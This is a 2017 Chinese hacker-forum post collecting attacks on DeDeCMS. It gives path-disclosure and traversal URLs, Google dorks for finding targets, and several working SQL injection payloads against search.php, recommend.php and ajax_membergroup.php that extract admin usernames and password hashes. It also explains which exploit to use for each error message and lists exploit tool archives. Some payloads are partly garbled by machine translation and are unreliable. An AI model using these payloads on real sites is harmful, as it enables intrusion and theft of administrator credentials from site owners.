DeDeCMS oday注入漏洞总结

白蚂蚁
25854白蚂蚁网络安全主管
2017-06-20 05:34:24
25854 2017-06-20 05:34:24
1.include /对话框/ select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,管理无需
员帐号,新版本的就直接转向了后台。
2.include / dialog / config.php会爆出后台管理路径
3.include / dialog / select_soft.php?activepath = / include / FCKeditor跳转目录
4.include / dialog / select_soft.php?activepath = / st0pst0pst0pst0pst0pst0pst0pst0p爆出网站绝对路径。
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
到根目录去。不过这些版本的访问地址有些不同。
地址为require / dialog / select_soft.php?activepath = /。/。/。/。/。/。/。/。/
include \ dialog \目录下的另外几个文件都存在同一个问题,只是默认设的目录不同。有些可以查看HTML这些文件哦..
存在相同问题的文件还有
include \ dialog \ select_images.php
include \ dialog \ select_media.php
include \ dialog \ select_templets.php

找版本:/data/admin/ver.txt

/data/mysql_error_trace.inc  

/data/mysqli_error_trace.inc  

googel

inurl:?dopost = showad
site:www.xxx.com  inurl:login.php?gotopage =

爆路径/ plus / carbuyaction .php?dopost = return&code = bank
/plus/carbuyaction.php?dopost=return&code=cod/Include/payment/alipay.php
/Include/payment/yeepay.php

201210305.7SP或5.7
201206215.7SP1或5.7或5.6
201204305.7SP或5.7或5.6
201207095.6
201112055.7.18
20111111v57或v56或
v55 20080307v3或v4或v 5
20080324v5以上  
200812185.1sp
201008035.6
20081009v5.1sp
200808075.1或5.2
201010215.3
200909125.5
201211075.7
201112095.6
200908105.5


/ plugins

/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3, 4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,PWD,28来自+`%23 @__ admin`的29,30,31,32,33,34,35,36,37,38,39,40,41,42 +%23 @`\'`+] = a

/ plus / search .PHP?关键字= AS&typeArr [111%3D @'\'`)+联盟+选择+ 1,2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,PWD,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42 + from +`%23 @__ admin`%23 @`\'`+] = a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+ FROM +(选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((从+'%23 @__ admin` +极限+ 0选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+, 1),1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a

/plus/recommend.php?aid=1&_FILES [type] [名称]&_ FILES [type] [size]&_ FILES
[type] [type]&_ FILES [type] [tmp_name] = aa \'和+ char(@`'`)+ / *!50000Un
ion * / + / *!50000SeLect * / + 1,2,3,共 ncat(0x3C6162633E,group_conc
在(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20从%20`%23 @__ admin`%23

------- ------------------------------------
提交/plus/search.php?keyword=as&typeArr [uNion] = a  


看结果如果提示  
安全提示:请求错误步骤2!  
那么直接用下面的exp  

xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1, 2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, PWD,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 +从+`%23 @__ admin`%23 @'\'`+] =一



看到结果如果提示  
安全提示:请求错误步骤1!  
那么直接用下面的exp  

xx.com/plus/search.php?keyword=as&typeArr [111%3D @`\'`)+和+(SELECT + 1 + FROM +选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+从+'%23 @__ admin` +极限+ 0,1) ,1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a
___________________
会员注入

织梦CMS5.7注入
2012.05.12 没有评论  
①注入漏洞。
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面
然后写上语句
查看管理员帐号

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23 @__ admin`%20where%201%20or%20id = @`'`

查看管理员密码


/部件/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@


Dede+v5.7+feedback.php-12-10-31.zip
DedeCms buy_action SQL利用工具.zip

dedecms recommend.php注入利用工具.rar
DeDeCMS v5.7暴密码exp.rar

dedecms v55漏洞利用.zip
DeDECMS5.7 Inc 漏洞.rar

dedecms上传ODAY.zip
dede爆菊.zip

dede注入导出.zip
织梦(dedecms)全版本注入工具.zip

exp.zip

本文标题:DeDeCMS oday注入漏洞总结
本文作者:白蚂蚁
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t623.html
附件
997704828
沙发997704828编程小子 2017-07-07 14:02
6666666666
997704828
板凳997704828编程小子 2017-07-07 14:10
666
997704828
地板997704828编程小子 2017-07-07 14:10
6666666
小影GG
4楼小影GG白蚁王族 2018-11-15 10:14
应该用不了了吧,版本好像有点低
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan